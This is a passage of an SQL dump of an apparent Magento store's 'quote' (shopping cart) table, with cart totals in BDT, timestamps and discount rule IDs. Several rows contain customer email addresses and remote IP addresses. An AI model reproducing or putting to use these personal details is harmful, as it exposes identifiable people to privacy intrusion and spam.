(410, 1, '2024-08-02 01:57:58', '2024-08-02 02:07:19', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(411, 1, '2024-08-02 04:11:50', '2024-08-02 04:20:12', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(412, 1, '2024-08-02 12:08:39', '2024-08-02 12:15:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(413, 1, '2024-08-02 14:47:29', '2024-08-02 14:52:58', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(414, 1, '2024-08-03 09:20:04', '2024-08-03 09:44:06', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(415, 1, '2024-08-03 17:46:05', '2024-08-03 17:46:05', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 337.6000, 337.6000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '27.147.197.208', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 422.0000, 422.0000, 337.6000, 337.6000, 1, 0, NULL, NULL, 0),
(416, 1, '2024-08-04 00:18:21', '2024-08-04 00:26:19', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(417, 1, '2024-08-05 17:01:20', '2024-08-05 17:42:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(418, 1, '2024-08-06 13:38:57', '2024-08-06 13:49:16', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(419, 1, '2024-08-09 09:29:31', '2024-08-09 09:33:01', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(420, 1, '2024-08-13 03:35:01', '2024-08-13 03:37:28', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(421, 1, '2024-08-14 00:20:56', '2024-08-14 00:23:27', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(422, 1, '2024-08-15 06:18:34', '2024-08-15 06:29:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(423, 1, '2024-08-19 18:32:08', '2024-08-19 18:43:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(424, 1, '2024-09-17 12:18:09', '2024-09-17 12:18:09', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 100, NULL, 1, 'doris_nugentmeds@outlook.com', NULL, 'kKTWYkogiil', NULL, 'MGEnstoAiw', NULL, NULL, NULL, 1, 0, '168.232.27.163', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(425, 1, '2024-09-22 17:27:39', '2024-09-22 17:27:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 101, NULL, 1, 'joyce30compon06@outlook.com', NULL, 'EDQYtkBwbdqtAc', NULL, 'PnXauvedTjvO', NULL, NULL, NULL, 1, 0, '111.95.216.185', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(426, 0, '2024-09-28 01:54:21', '2024-09-28 01:54:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(427, 1, '2024-09-28 19:21:18', '2024-09-28 19:21:18', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 102, NULL, 1, 'alileasm@gmail.com', NULL, 'DqrUWxryKwyN', NULL, 'LZfiXbwWVob', NULL, NULL, NULL, 1, 0, '124.158.186.199', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(428, 1, '2024-10-01 09:48:08', '2024-10-01 09:48:08', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 103, NULL, 1, 'cofcgirl101@yahoo.com', NULL, 'jXdIqrET', NULL, 'vxfukYXpWuwPSbf', NULL, NULL, NULL, 1, 0, '46.148.35.141', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(429, 1, '2024-10-09 08:33:07', '2024-10-09 08:34:42', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 519.4000, 519.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.77.100.17', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(430, 1, '2024-10-18 10:25:07', '2024-10-18 10:25:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 104, NULL, 1, 'steelesimfoniyax8834@gmail.com', NULL, 'mHqRgkkGdDMAPks', NULL, 'xPCYMANwT', NULL, NULL, NULL, 1, 0, '154.72.83.214', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(431, 1, '2024-10-21 19:10:26', '2024-10-21 19:10:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 105, NULL, 1, 'kassiaanu31@gmail.com', NULL, 'TFPhpytCELaaz', NULL, 'MrwASwPD', NULL, NULL, NULL, 1, 0, '182.253.122.142', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(432, 1, '2024-10-26 02:34:17', '2024-10-26 02:34:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 106, NULL, 1, 'sanngravesz7143@gmail.com', NULL, 'nAjZmuYYlv', NULL, 'ZweLkcDnpu', NULL, NULL, NULL, 1, 0, '202.124.43.25', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(433, 1, '2024-11-04 11:58:35', '2024-11-04 11:58:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 107, NULL, 1, 'wvvvferijxmff@yahoo.com', NULL, 'HOSsIHHNLFtXUa', NULL, 'GxqRtAjmmUUtGE', NULL, NULL, NULL, 1, 0, '105.27.202.234', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(434, 1, '2024-11-17 09:57:20', '2024-11-17 09:57:20', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 108, NULL, 1, 'wores42102@gianes.com', NULL, 'asd', NULL, 'ads', NULL, NULL, NULL, 1, 0, '185.29.9.162', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(435, 1, '2025-01-03 19:33:39', '2025-01-03 19:33:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(436, 1, '2025-01-07 07:43:00', '2025-01-07 07:43:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(437, 1, '2025-01-28 07:29:49', '2025-01-28 07:29:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(438, 1, '2025-01-28 07:30:20', '2025-01-28 07:30:24', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(439, 1, '2025-01-28 07:30:49', '2025-01-28 07:30:55', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(440, 1, '2025-01-28 07:31:15', '2025-01-28 07:31:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(441, 1, '2025-01-28 07:31:39', '2025-01-28 07:31:44', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(442, 1, '2025-01-28 07:32:02', '2025-01-28 07:32:07', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(443, 1, '2025-02-05 11:09:15', '2025-02-05 11:09:15', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 110, NULL, 1, 'hotoxo5768@numerobo.com', NULL, 'jig', NULL, 'jdf', NULL, NULL, NULL, 1, 0, '51.81.126.15', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(444, 1, '2025-02-07 15:51:21', '2025-02-07 15:51:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '46.202.198.236', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(445, 1, '2025-02-09 16:26:21', '2025-02-09 16:26:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 336.8000, 336.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '46.202.198.236', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 421.0000, 421.0000, 336.8000, 336.8000, 1, 0, NULL, NULL, 0),
(446, 1, '2025-02-23 04:23:10', '2025-02-23 04:23:10', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '103.121.65.82', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(447, 1, '2025-02-28 19:58:26', '2025-02-28 19:58:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, 111, NULL, 1, 'lnjybaho@do-not-respond.me', NULL, 'John', NULL, 'John', NULL, NULL, NULL, 1, 0, '196.251.71.171', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(448, 1, '2025-03-03 03:01:53', '2025-03-03 03:01:53', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 54.0000, 54.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '120.28.137.122', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 54.0000, 54.0000, 54.0000, 54.0000, 1, 0, NULL, NULL, 0),
(449, 1, '2025-03-05 14:27:58', '2025-03-05 14:27:58', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '195.35.37.159', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(450, 1, '2025-03-08 11:10:29', '2025-03-08 12:54:26', NULL, 1, 0, 0, 7, 173.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32728.8000, 32728.8000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.147.125.11', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 40911.0000, 40911.0000, 32728.8000, 32728.8000, 1, 0, NULL, NULL, 0),
(451, 1, '2025-03-09 15:52:17', '2025-03-09 15:52:17', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 111.0000, 111.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(452, 1, '2025-03-09 15:52:42', '2025-03-09 15:52:47', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(453, 1, '2025-03-09 15:53:01', '2025-03-09 15:53:06', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(454, 1, '2025-03-09 15:53:18', '2025-03-09 15:53:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(455, 1, '2025-03-09 15:53:37', '2025-03-09 15:53:41', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(456, 1, '2025-03-09 15:53:54', '2025-03-09 15:53:57', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 116.0000, 116.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '185.208.158.165', '2', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 111.0000, 111.0000, 111.0000, 111.0000, 1, 0, NULL, NULL, 0),
(457, 1, '2025-03-30 07:00:32', '2025-03-30 07:00:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(458, 1, '2025-03-30 07:39:49', '2025-03-30 07:39:49', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(459, 1, '2025-03-30 07:43:21', '2025-03-30 07:43:21', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0);
INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(460, 1, '2025-03-30 07:44:50', '2025-03-30 07:44:50', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(461, 1, '2025-03-30 07:47:56', '2025-03-30 07:47:56', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(462, 1, '2025-03-30 07:49:29', '2025-03-30 07:49:29', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(463, 1, '2025-03-30 07:51:18', '2025-03-30 07:51:18', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(464, 1, '2025-03-30 07:52:45', '2025-03-30 07:52:45', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(465, 1, '2025-03-30 07:54:45', '2025-03-30 07:54:45', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(466, 1, '2025-03-30 07:58:51', '2025-03-30 07:58:51', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 32.0000, 32.0000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '31.220.18.228', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 32.0000, 32.0000, 32.0000, 32.0000, 1, 0, NULL, NULL, 0),
(467, 1, '2025-04-07 08:54:24', '2025-04-07 08:54:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '95.217.18.161', NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
